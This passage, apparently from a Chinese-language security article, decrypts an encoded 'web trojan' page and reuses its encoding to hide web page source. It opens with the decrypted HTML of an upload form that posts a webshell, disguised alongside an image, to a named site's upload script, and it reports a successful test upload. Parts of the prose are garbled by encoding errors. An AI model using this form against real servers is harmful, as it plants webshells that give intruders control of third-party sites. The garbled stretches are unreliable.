<body>
<form action=http://www.51iccard.com/upfile_other.asp method=post name=form1 onsubmit=return
click() enctype=multipart/form-data>
<p align="center"><span class="STYLE4"> 源(</span><span class="STYLE3">圖片</span><span class="STYLE4">)文件：
</span>
<input name="filename" type="file" class="buttonUnActive" size="20">
<span class="STYLE4">
目標(</span><span class="STYLE3">大馬</span><span class="STYLE4">)文件：
</span>
<input name="filename1" type=file class=buttonUnActive size=20></p>
<p align="center">
<input name=submit type=submit class="button" style=border"1px value=上傳大馬 double rgb(88.88.88);font:9pt>
<input name=imgwidth type=hidden id=imgwidth>
<input name=imgheight type=hidden id=imgheight>
<input name=aligntype type=hidden id="channelid" value="0">
<input name="channelid" type="hidden" id="channelurlid" value=0>
<input name="id" type="hidden" id="id2">
</p>



　　4、解密效果
　　拷貝解密后的html代碼保存為一test.htm文件，在瀏覽器中打開，進行上傳測試成功，說明對該網(wǎng)馬的ASC解密成功。(圖3)

　　5、加密利用
　　在破解了該網(wǎng)馬的ASC加密之后，我們利用該網(wǎng)馬的加密原理對我們的網(wǎng)頁進行加密，達到保護網(wǎng)頁代碼的效果。ASC加密主要用來保護靜態(tài)頁面代碼，動態(tài)代碼由于在服務器端，客戶端顯示的只是運行結(jié)果?！癐T專家網(wǎng)”的頁面是動態(tài)生成的，作為演示就以它為例進行。
　　查看并拷貝網(wǎng)頁代碼，通過“ASCCII速查器”把字符轉(zhuǎn)換成ASC值。然后把生成的ASC值拷貝到我們破解的網(wǎng)馬代碼中作為t的值。這樣可以別人就不能看到網(wǎng)頁源代碼，看到的只是其的ASC值，對網(wǎng)頁代碼起到了一定的保護作用，運行效果和加密前完全一樣。(圖4)

　　總結(jié)：ASC加密是當前靜態(tài)網(wǎng)頁加密的主要形式，從上面筆者對某網(wǎng)馬的解密看，這種加密形式并不能從根本上保證網(wǎng)頁代碼的安全?；诠P者及其朋友網(wǎng)站維護的經(jīng)驗，推薦幾種網(wǎng)頁加密方法：
　　1、腳本加密，通過類似VB、JAVA這樣腳本代碼實現(xiàn)：封鎖鼠標右鍵、禁止查看源文件、鏈接調(diào)用地址加密等功能。
　　2、IIS的密碼，通過對IIS的安全、驗證等部署，防止非授權的訪問。
　　3、ASP程序加密，使用ASP程序來給網(wǎng)頁進行加密，現(xiàn)在大多數(shù)網(wǎng)站都使用ASP程序，它對Web服務器沒有具體要求，而其加密就是借助數(shù)據(jù)庫及ASP程序進行設計，來實現(xiàn)一種通用網(wǎng)頁加密。
　　4、軟件加密，現(xiàn)在給網(wǎng)頁加密的軟件非常多，其基本原理都是利用javascript代碼，只不過是這些軟件都自動準備好了這些代碼，只需使用者將網(wǎng)頁源代碼粘進去點擊“加密”按鈕就可以了。

最新評論